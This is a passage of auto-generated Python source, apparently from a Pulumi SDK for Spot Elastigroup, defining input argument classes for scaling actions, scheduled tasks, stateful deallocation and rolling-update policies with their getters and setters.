:param pulumi.Input[str] name: The record set name.
:param pulumi.Input[str] value: The dimension value.
"""
pulumi.set(__self__, "name", name)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The dimension value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupScalingUpPolicyStepAdjustmentArgs:
def __init__(__self__, *,
action: pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentActionArgs'],
threshold: pulumi.Input[int]):
"""
:param pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentActionArgs'] action: Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
:param pulumi.Input[int] threshold: The value against which the specified statistic is compared. If a `step_adjustment` object is defined, then it cannot be specified.
"""
pulumi.set(__self__, "action", action)
pulumi.set(__self__, "threshold", threshold)
@property
@pulumi.getter
def action(self) -> pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentActionArgs']:
"""
Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input['ElastigroupScalingUpPolicyStepAdjustmentActionArgs']):
pulumi.set(self, "action", value)
@property
@pulumi.getter
def threshold(self) -> pulumi.Input[int]:
"""
The value against which the specified statistic is compared. If a `step_adjustment` object is defined, then it cannot be specified.
"""
return pulumi.get(self, "threshold")
@threshold.setter
def threshold(self, value: pulumi.Input[int]):
pulumi.set(self, "threshold", value)
@pulumi.input_type
class ElastigroupScalingUpPolicyStepAdjustmentActionArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
adjustment: Optional[pulumi.Input[str]] = None,
max_target_capacity: Optional[pulumi.Input[str]] = None,
maximum: Optional[pulumi.Input[str]] = None,
min_target_capacity: Optional[pulumi.Input[str]] = None,
minimum: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] type: String, Action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
:param pulumi.Input[str] adjustment: The number of instances to add or remove.
:param pulumi.Input[str] max_target_capacity: The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
:param pulumi.Input[str] maximum: The upper limit number of instances that you can scale up to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"minimum"` are not defined.
:param pulumi.Input[str] min_target_capacity: The desired target capacity of a group. Required if using `"setMinTarget"` as action type
:param pulumi.Input[str] minimum: The lower limit number of instances that you can scale down to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"maximum"` are not defined.
:param pulumi.Input[str] target: The desired number of instances. Required if using `"updateCapacity"` as action type and neither `"minimum"` nor `"maximum"` are not defined.
"""
pulumi.set(__self__, "type", type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if max_target_capacity is not None:
pulumi.set(__self__, "max_target_capacity", max_target_capacity)
if maximum is not None:
pulumi.set(__self__, "maximum", maximum)
if min_target_capacity is not None:
pulumi.set(__self__, "min_target_capacity", min_target_capacity)
if minimum is not None:
pulumi.set(__self__, "minimum", minimum)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
String, Action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add or remove.
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter(name="maxTargetCapacity")
def max_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired target capacity of a group. Required if using `"setMaxTarget"` as action type
"""
return pulumi.get(self, "max_target_capacity")
@max_target_capacity.setter
def max_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_target_capacity", value)
@property
@pulumi.getter
def maximum(self) -> Optional[pulumi.Input[str]]:
"""
The upper limit number of instances that you can scale up to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"minimum"` are not defined.
"""
return pulumi.get(self, "maximum")
@maximum.setter
def maximum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "maximum", value)
@property
@pulumi.getter(name="minTargetCapacity")
def min_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired target capacity of a group. Required if using `"setMinTarget"` as action type
"""
return pulumi.get(self, "min_target_capacity")
@min_target_capacity.setter
def min_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_target_capacity", value)
@property
@pulumi.getter
def minimum(self) -> Optional[pulumi.Input[str]]:
"""
The lower limit number of instances that you can scale down to. Required if using `"updateCapacity"` as action type and neither `"target"` nor `"maximum"` are not defined.
"""
return pulumi.get(self, "minimum")
@minimum.setter
def minimum(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "minimum", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
The desired number of instances. Required if using `"updateCapacity"` as action type and neither `"minimum"` nor `"maximum"` are not defined.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@pulumi.input_type
class ElastigroupScheduledTaskArgs:
def __init__(__self__, *,
task_type: pulumi.Input[str],
adjustment: Optional[pulumi.Input[str]] = None,
adjustment_percentage: Optional[pulumi.Input[str]] = None,
batch_size_percentage: Optional[pulumi.Input[str]] = None,
cron_expression: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
grace_period: Optional[pulumi.Input[str]] = None,
is_enabled: Optional[pulumi.Input[bool]] = None,
max_capacity: Optional[pulumi.Input[str]] = None,
min_capacity: Optional[pulumi.Input[str]] = None,
scale_max_capacity: Optional[pulumi.Input[str]] = None,
scale_min_capacity: Optional[pulumi.Input[str]] = None,
scale_target_capacity: Optional[pulumi.Input[str]] = None,
start_time: Optional[pulumi.Input[str]] = None,
target_capacity: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] task_type: The task type to run. Supported task types are: `"scale"`, `"backup_ami"`, `"roll"`, `"scaleUp"`, `"percentageScaleUp"`, `"scaleDown"`, `"percentageScaleDown"`, `"statefulUpdateCapacity"`.
:param pulumi.Input[str] adjustment: The number of instances to add or remove.
:param pulumi.Input[str] adjustment_percentage: The percentage of instances to add or remove.
:param pulumi.Input[str] batch_size_percentage: The percentage size of each batch in the scheduled deployment roll.
:param pulumi.Input[str] cron_expression: A valid cron expression. The cron is running in UTC time zone and is in [Unix cron format](https://en.wikipedia.org/wiki/Cron).
:param pulumi.Input[str] frequency: The recurrence frequency to run this task. Supported values are `"hourly"`, `"daily"`, `"weekly"` and `"continuous"`.
:param pulumi.Input[str] grace_period: The period of time (seconds) to wait before checking a batch's health after it's deployment.
:param pulumi.Input[bool] is_enabled: Setting the task to being enabled or disabled.
:param pulumi.Input[str] max_capacity: The maximum number of instances the group should have.
:param pulumi.Input[str] min_capacity: The minimum number of instances the group should have.
:param pulumi.Input[str] scale_max_capacity: The maximum number of instances the group should have.
:param pulumi.Input[str] scale_min_capacity: The minimum number of instances the group should have.
:param pulumi.Input[str] scale_target_capacity: The desired number of instances the group should have.
:param pulumi.Input[str] start_time: Set a start time for one time tasks.
:param pulumi.Input[str] target_capacity: The desired number of instances the group should have.
"""
pulumi.set(__self__, "task_type", task_type)
if adjustment is not None:
pulumi.set(__self__, "adjustment", adjustment)
if adjustment_percentage is not None:
pulumi.set(__self__, "adjustment_percentage", adjustment_percentage)
if batch_size_percentage is not None:
pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
if cron_expression is not None:
pulumi.set(__self__, "cron_expression", cron_expression)
if frequency is not None:
pulumi.set(__self__, "frequency", frequency)
if grace_period is not None:
pulumi.set(__self__, "grace_period", grace_period)
if is_enabled is not None:
pulumi.set(__self__, "is_enabled", is_enabled)
if max_capacity is not None:
pulumi.set(__self__, "max_capacity", max_capacity)
if min_capacity is not None:
pulumi.set(__self__, "min_capacity", min_capacity)
if scale_max_capacity is not None:
pulumi.set(__self__, "scale_max_capacity", scale_max_capacity)
if scale_min_capacity is not None:
pulumi.set(__self__, "scale_min_capacity", scale_min_capacity)
if scale_target_capacity is not None:
pulumi.set(__self__, "scale_target_capacity", scale_target_capacity)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
if target_capacity is not None:
pulumi.set(__self__, "target_capacity", target_capacity)
@property
@pulumi.getter(name="taskType")
def task_type(self) -> pulumi.Input[str]:
"""
The task type to run. Supported task types are: `"scale"`, `"backup_ami"`, `"roll"`, `"scaleUp"`, `"percentageScaleUp"`, `"scaleDown"`, `"percentageScaleDown"`, `"statefulUpdateCapacity"`.
"""
return pulumi.get(self, "task_type")
@task_type.setter
def task_type(self, value: pulumi.Input[str]):
pulumi.set(self, "task_type", value)
@property
@pulumi.getter
def adjustment(self) -> Optional[pulumi.Input[str]]:
"""
The number of instances to add or remove.
"""
return pulumi.get(self, "adjustment")
@adjustment.setter
def adjustment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment", value)
@property
@pulumi.getter(name="adjustmentPercentage")
def adjustment_percentage(self) -> Optional[pulumi.Input[str]]:
"""
The percentage of instances to add or remove.
"""
return pulumi.get(self, "adjustment_percentage")
@adjustment_percentage.setter
def adjustment_percentage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "adjustment_percentage", value)
@property
@pulumi.getter(name="batchSizePercentage")
def batch_size_percentage(self) -> Optional[pulumi.Input[str]]:
"""
The percentage size of each batch in the scheduled deployment roll.
"""
return pulumi.get(self, "batch_size_percentage")
@batch_size_percentage.setter
def batch_size_percentage(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "batch_size_percentage", value)
@property
@pulumi.getter(name="cronExpression")
def cron_expression(self) -> Optional[pulumi.Input[str]]:
"""
A valid cron expression. The cron is running in UTC time zone and is in [Unix cron format](https://en.wikipedia.org/wiki/Cron).
"""
return pulumi.get(self, "cron_expression")
@cron_expression.setter
def cron_expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cron_expression", value)
@property
@pulumi.getter
def frequency(self) -> Optional[pulumi.Input[str]]:
"""
The recurrence frequency to run this task. Supported values are `"hourly"`, `"daily"`, `"weekly"` and `"continuous"`.
"""
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> Optional[pulumi.Input[str]]:
"""
The period of time (seconds) to wait before checking a batch's health after it's deployment.
"""
return pulumi.get(self, "grace_period")
@grace_period.setter
def grace_period(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "grace_period", value)
@property
@pulumi.getter(name="isEnabled")
def is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Setting the task to being enabled or disabled.
"""
return pulumi.get(self, "is_enabled")
@is_enabled.setter
def is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_enabled", value)
@property
@pulumi.getter(name="maxCapacity")
def max_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The maximum number of instances the group should have.
"""
return pulumi.get(self, "max_capacity")
@max_capacity.setter
def max_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "max_capacity", value)
@property
@pulumi.getter(name="minCapacity")
def min_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The minimum number of instances the group should have.
"""
return pulumi.get(self, "min_capacity")
@min_capacity.setter
def min_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "min_capacity", value)
@property
@pulumi.getter(name="scaleMaxCapacity")
def scale_max_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The maximum number of instances the group should have.
"""
return pulumi.get(self, "scale_max_capacity")
@scale_max_capacity.setter
def scale_max_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_max_capacity", value)
@property
@pulumi.getter(name="scaleMinCapacity")
def scale_min_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The minimum number of instances the group should have.
"""
return pulumi.get(self, "scale_min_capacity")
@scale_min_capacity.setter
def scale_min_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_min_capacity", value)
@property
@pulumi.getter(name="scaleTargetCapacity")
def scale_target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired number of instances the group should have.
"""
return pulumi.get(self, "scale_target_capacity")
@scale_target_capacity.setter
def scale_target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "scale_target_capacity", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
"""
Set a start time for one time tasks.
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@property
@pulumi.getter(name="targetCapacity")
def target_capacity(self) -> Optional[pulumi.Input[str]]:
"""
The desired number of instances the group should have.
"""
return pulumi.get(self, "target_capacity")
@target_capacity.setter
def target_capacity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_capacity", value)
@pulumi.input_type
class ElastigroupSignalArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
timeout: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] name: The name of the signal defined for the group. Valid Values: `"INSTANCE_READY"`, `"INSTANCE_READY_TO_SHUTDOWN"`
:param pulumi.Input[int] timeout: The signals defined timeout- default is 40 minutes (1800 seconds).
"""
pulumi.set(__self__, "name", name)
if timeout is not None:
pulumi.set(__self__, "timeout", timeout)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the signal defined for the group. Valid Values: `"INSTANCE_READY"`, `"INSTANCE_READY_TO_SHUTDOWN"`
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def timeout(self) -> Optional[pulumi.Input[int]]:
"""
The signals defined timeout- default is 40 minutes (1800 seconds).
"""
return pulumi.get(self, "timeout")
@timeout.setter
def timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout", value)
@pulumi.input_type
class ElastigroupStatefulDeallocationArgs:
def __init__(__self__, *,
should_delete_images: Optional[pulumi.Input[bool]] = None,
should_delete_network_interfaces: Optional[pulumi.Input[bool]] = None,
should_delete_snapshots: Optional[pulumi.Input[bool]] = None,
should_delete_volumes: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[bool] should_delete_images: For stateful groups: remove persistent images.
:param pulumi.Input[bool] should_delete_network_interfaces: For stateful groups: remove network interfaces.
:param pulumi.Input[bool] should_delete_snapshots: For stateful groups: remove snapshots.
:param pulumi.Input[bool] should_delete_volumes: For stateful groups: remove persistent volumes.
"""
if should_delete_images is not None:
pulumi.set(__self__, "should_delete_images", should_delete_images)
if should_delete_network_interfaces is not None:
pulumi.set(__self__, "should_delete_network_interfaces", should_delete_network_interfaces)
if should_delete_snapshots is not None:
pulumi.set(__self__, "should_delete_snapshots", should_delete_snapshots)
if should_delete_volumes is not None:
pulumi.set(__self__, "should_delete_volumes", should_delete_volumes)
@property
@pulumi.getter(name="shouldDeleteImages")
def should_delete_images(self) -> Optional[pulumi.Input[bool]]:
"""
For stateful groups: remove persistent images.
"""
return pulumi.get(self, "should_delete_images")
@should_delete_images.setter
def should_delete_images(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_delete_images", value)
@property
@pulumi.getter(name="shouldDeleteNetworkInterfaces")
def should_delete_network_interfaces(self) -> Optional[pulumi.Input[bool]]:
"""
For stateful groups: remove network interfaces.
"""
return pulumi.get(self, "should_delete_network_interfaces")
@should_delete_network_interfaces.setter
def should_delete_network_interfaces(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_delete_network_interfaces", value)
@property
@pulumi.getter(name="shouldDeleteSnapshots")
def should_delete_snapshots(self) -> Optional[pulumi.Input[bool]]:
"""
For stateful groups: remove snapshots.
"""
return pulumi.get(self, "should_delete_snapshots")
@should_delete_snapshots.setter
def should_delete_snapshots(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_delete_snapshots", value)
@property
@pulumi.getter(name="shouldDeleteVolumes")
def should_delete_volumes(self) -> Optional[pulumi.Input[bool]]:
"""
For stateful groups: remove persistent volumes.
"""
return pulumi.get(self, "should_delete_volumes")
@should_delete_volumes.setter
def should_delete_volumes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_delete_volumes", value)
@pulumi.input_type
class ElastigroupStatefulInstanceActionArgs:
def __init__(__self__, *,
stateful_instance_id: pulumi.Input[str],
type: pulumi.Input[str]):
"""
:param pulumi.Input[str] stateful_instance_id: String, Stateful Instance ID on which the action should be performed.
:param pulumi.Input[str] type: String, Action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
"""
pulumi.set(__self__, "stateful_instance_id", stateful_instance_id)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="statefulInstanceId")
def stateful_instance_id(self) -> pulumi.Input[str]:
"""
String, Stateful Instance ID on which the action should be performed.
"""
return pulumi.get(self, "stateful_instance_id")
@stateful_instance_id.setter
def stateful_instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "stateful_instance_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
String, Action type. Supported action types: `pause`, `resume`, `recycle`, `deallocate`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ElastigroupTagArgs:
def __init__(__self__, *,
key: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] value: The dimension value.
"""
if key is not None:
pulumi.set(__self__, "key", key)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
The dimension value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupUpdatePolicyArgs:
def __init__(__self__, *,
should_resume_stateful: pulumi.Input[bool],
should_roll: pulumi.Input[bool],
auto_apply_tags: Optional[pulumi.Input[bool]] = None,
roll_config: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigArgs']] = None):
"""
:param pulumi.Input[bool] should_resume_stateful: This will apply resuming action for Stateful instances in the Elastigroup upon scale up or capacity changes. Example usage will be for Elastigroups that will have scheduling rules to set a target capacity of 0 instances in the night and automatically restore the same state of the instances in the morning.
:param pulumi.Input[bool] should_roll: Sets the enablement of the roll option.
:param pulumi.Input[bool] auto_apply_tags: Enables updates to tags without rolling the group when set to `true`.
:param pulumi.Input['ElastigroupUpdatePolicyRollConfigArgs'] roll_config: While used, you can control whether the group should perform a deployment after an update to the configuration.
"""
pulumi.set(__self__, "should_resume_stateful", should_resume_stateful)
pulumi.set(__self__, "should_roll", should_roll)
if auto_apply_tags is not None:
pulumi.set(__self__, "auto_apply_tags", auto_apply_tags)
if roll_config is not None:
pulumi.set(__self__, "roll_config", roll_config)
@property
@pulumi.getter(name="shouldResumeStateful")
def should_resume_stateful(self) -> pulumi.Input[bool]:
"""
This will apply resuming action for Stateful instances in the Elastigroup upon scale up or capacity changes. Example usage will be for Elastigroups that will have scheduling rules to set a target capacity of 0 instances in the night and automatically restore the same state of the instances in the morning.
"""
return pulumi.get(self, "should_resume_stateful")
@should_resume_stateful.setter
def should_resume_stateful(self, value: pulumi.Input[bool]):
pulumi.set(self, "should_resume_stateful", value)
@property
@pulumi.getter(name="shouldRoll")
def should_roll(self) -> pulumi.Input[bool]:
"""
Sets the enablement of the roll option.
"""
return pulumi.get(self, "should_roll")
@should_roll.setter
def should_roll(self, value: pulumi.Input[bool]):
pulumi.set(self, "should_roll", value)
@property
@pulumi.getter(name="autoApplyTags")
def auto_apply_tags(self) -> Optional[pulumi.Input[bool]]:
"""
Enables updates to tags without rolling the group when set to `true`.
"""
return pulumi.get(self, "auto_apply_tags")
@auto_apply_tags.setter
def auto_apply_tags(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_apply_tags", value)
@property
@pulumi.getter(name="rollConfig")
def roll_config(self) -> Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigArgs']]:
"""
While used, you can control whether the group should perform a deployment after an update to the configuration.
"""
return pulumi.get(self, "roll_config")
@roll_config.setter
def roll_config(self, value: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigArgs']]):
pulumi.set(self, "roll_config", value)
@pulumi.input_type
class ElastigroupUpdatePolicyRollConfigArgs:
def __init__(__self__, *,
batch_size_percentage: pulumi.Input[int],
grace_period: Optional[pulumi.Input[int]] = None,
health_check_type: Optional[pulumi.Input[str]] = None,
strategy: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyArgs']] = None,
wait_for_roll_percentage: Optional[pulumi.Input[float]] = None,
wait_for_roll_timeout: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] batch_size_percentage: Sets the percentage of the instances to deploy in each batch.
:param pulumi.Input[int] grace_period: Sets the grace period for new instances to become healthy.
:param pulumi.Input[str] health_check_type: Sets the health check type to use. Valid values: `"EC2"`, `"ECS_CLUSTER_INSTANCE"`, `"ELB"`, `"HCS"`, `"MLB"`, `"TARGET_GROUP"`, `"MULTAI_TARGET_SET"`, `"NONE"`.
:param pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyArgs'] strategy: Strategy parameters
:param pulumi.Input[float] wait_for_roll_percentage: For use with `should_roll`. Sets minimum % of roll required to complete before continuing the plan. Required if `wait_for_roll_timeout` is set.
:param pulumi.Input[int] wait_for_roll_timeout: For use with `should_roll`. Sets how long to wait for the deployed % of a roll to exceed `wait_for_roll_percentage` before continuing the plan. Required if `wait_for_roll_percentage` is set.
"""
pulumi.set(__self__, "batch_size_percentage", batch_size_percentage)
if grace_period is not None:
pulumi.set(__self__, "grace_period", grace_period)
if health_check_type is not None:
pulumi.set(__self__, "health_check_type", health_check_type)
if strategy is not None:
pulumi.set(__self__, "strategy", strategy)
if wait_for_roll_percentage is not None:
pulumi.set(__self__, "wait_for_roll_percentage", wait_for_roll_percentage)
if wait_for_roll_timeout is not None:
pulumi.set(__self__, "wait_for_roll_timeout", wait_for_roll_timeout)
@property
@pulumi.getter(name="batchSizePercentage")
def batch_size_percentage(self) -> pulumi.Input[int]:
"""
Sets the percentage of the instances to deploy in each batch.
"""
return pulumi.get(self, "batch_size_percentage")
@batch_size_percentage.setter
def batch_size_percentage(self, value: pulumi.Input[int]):
pulumi.set(self, "batch_size_percentage", value)
@property
@pulumi.getter(name="gracePeriod")
def grace_period(self) -> Optional[pulumi.Input[int]]:
"""
Sets the grace period for new instances to become healthy.
"""
return pulumi.get(self, "grace_period")
@grace_period.setter
def grace_period(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "grace_period", value)
@property
@pulumi.getter(name="healthCheckType")
def health_check_type(self) -> Optional[pulumi.Input[str]]:
"""
Sets the health check type to use. Valid values: `"EC2"`, `"ECS_CLUSTER_INSTANCE"`, `"ELB"`, `"HCS"`, `"MLB"`, `"TARGET_GROUP"`, `"MULTAI_TARGET_SET"`, `"NONE"`.
"""
return pulumi.get(self, "health_check_type")
@health_check_type.setter
def health_check_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health_check_type", value)
@property
@pulumi.getter
def strategy(self) -> Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyArgs']]:
"""
Strategy parameters
"""
return pulumi.get(self, "strategy")
@strategy.setter
def strategy(self, value: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyArgs']]):
pulumi.set(self, "strategy", value)
@property
@pulumi.getter(name="waitForRollPercentage")
def wait_for_roll_percentage(self) -> Optional[pulumi.Input[float]]:
"""
For use with `should_roll`. Sets minimum % of roll required to complete before continuing the plan. Required if `wait_for_roll_timeout` is set.
"""
return pulumi.get(self, "wait_for_roll_percentage")
@wait_for_roll_percentage.setter
def wait_for_roll_percentage(self, value: Optional[pulumi.Input[float]]):
pulumi.set(self, "wait_for_roll_percentage", value)
@property
@pulumi.getter(name="waitForRollTimeout")
def wait_for_roll_timeout(self) -> Optional[pulumi.Input[int]]:
"""
For use with `should_roll`. Sets how long to wait for the deployed % of a roll to exceed `wait_for_roll_percentage` before continuing the plan. Required if `wait_for_roll_percentage` is set.
"""
return pulumi.get(self, "wait_for_roll_timeout")
@wait_for_roll_timeout.setter
def wait_for_roll_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "wait_for_roll_timeout", value)
@pulumi.input_type
class ElastigroupUpdatePolicyRollConfigStrategyArgs:
def __init__(__self__, *,
action: pulumi.Input[str],
batch_min_healthy_percentage: Optional[pulumi.Input[int]] = None,
on_failure: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs']] = None,
should_drain_instances: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] action: Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
:param pulumi.Input[int] batch_min_healthy_percentage: Indicates the threshold of minimum healthy instances in single batch. If the amount of healthy instances in single batch is under the threshold, the deployment will fail. Range `1` - `100`.
:param pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs'] on_failure: Set detach options to the deployment.
:param pulumi.Input[bool] should_drain_instances: Specify whether to drain incoming TCP connections before terminating a server.
"""
pulumi.set(__self__, "action", action)
if batch_min_healthy_percentage is not None:
pulumi.set(__self__, "batch_min_healthy_percentage", batch_min_healthy_percentage)
if on_failure is not None:
pulumi.set(__self__, "on_failure", on_failure)
if should_drain_instances is not None:
pulumi.set(__self__, "should_drain_instances", should_drain_instances)
@property
@pulumi.getter
def action(self) -> pulumi.Input[str]:
"""
Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: pulumi.Input[str]):
pulumi.set(self, "action", value)
@property
@pulumi.getter(name="batchMinHealthyPercentage")
def batch_min_healthy_percentage(self) -> Optional[pulumi.Input[int]]:
"""
Indicates the threshold of minimum healthy instances in single batch. If the amount of healthy instances in single batch is under the threshold, the deployment will fail. Range `1` - `100`.
"""
return pulumi.get(self, "batch_min_healthy_percentage")
@batch_min_healthy_percentage.setter
def batch_min_healthy_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "batch_min_healthy_percentage", value)
@property
@pulumi.getter(name="onFailure")
def on_failure(self) -> Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs']]:
"""
Set detach options to the deployment.
"""
return pulumi.get(self, "on_failure")
@on_failure.setter
def on_failure(self, value: Optional[pulumi.Input['ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs']]):
pulumi.set(self, "on_failure", value)
@property
@pulumi.getter(name="shouldDrainInstances")
def should_drain_instances(self) -> Optional[pulumi.Input[bool]]:
"""
Specify whether to drain incoming TCP connections before terminating a server.
"""
return pulumi.get(self, "should_drain_instances")
@should_drain_instances.setter
def should_drain_instances(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "should_drain_instances", value)
@pulumi.input_type
class ElastigroupUpdatePolicyRollConfigStrategyOnFailureArgs:
def __init__(__self__, *,
action_type: pulumi.Input[str],
batch_num: Optional[pulumi.Input[int]] = None,
draining_timeout: Optional[pulumi.Input[int]] = None,
should_decrement_target_capacity: Optional[pulumi.Input[bool]] = None,
should_handle_all_batches: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] action_type: Sets the action that will take place, Accepted values are: `DETACH_OLD`, `DETACH_NEW`.
:param pulumi.Input[int] draining_timeout: Indicates (in seconds) the timeout to wait until instance are detached.
:param pulumi.Input[bool] should_decrement_target_capacity: Decrementing the group target capacity after detaching the instances.
:param pulumi.Input[bool] should_handle_all_batches: Indicator if the action should apply to all batches of the deployment or only the latest batch.
"""
pulumi.set(__self__, "action_type", action_type)
if batch_num is not None:
pulumi.set(__self__, "batch_num", batch_num)
if draining_timeout is not None:
pulumi.set(__self__, "draining_timeout", draining_timeout)
if should_decrement_target_capacity is not None:
pulumi.set(__self__, "should_decrement_target_capacity", should_decrement_target_capacity)
if should_handle_all_batches is not None:
pulumi.set(__self__, "should_handle_all_batches", should_handle_all_batches)
@property
@pulumi.getter(name="actionType")
def action_type(self) -> pulumi.Input[str]:
"""
Sets the action that will take place, Accepted values are: `DETACH_OLD`, `DETACH_NEW`.
"""
return pulumi.get(self, "action_type")
@action_type.setter
def action_type(self, value: pulumi.Input[str]):
pulumi.set(self, "action_type", value)
@property
@pulumi.getter(name="batchNum")
def batch_num(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "batch_num")
@batch_num.setter
def batch_num(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "batch_num", value)
@property
@pulumi.getter(name="drainingTimeout")
def draining_timeout(self) -> Optional[pulumi.Input[int]]:
"""
Indicates (in seconds) the timeout to wait until instance are detached.
"""
return pulumi.get(self, "draining_timeout")
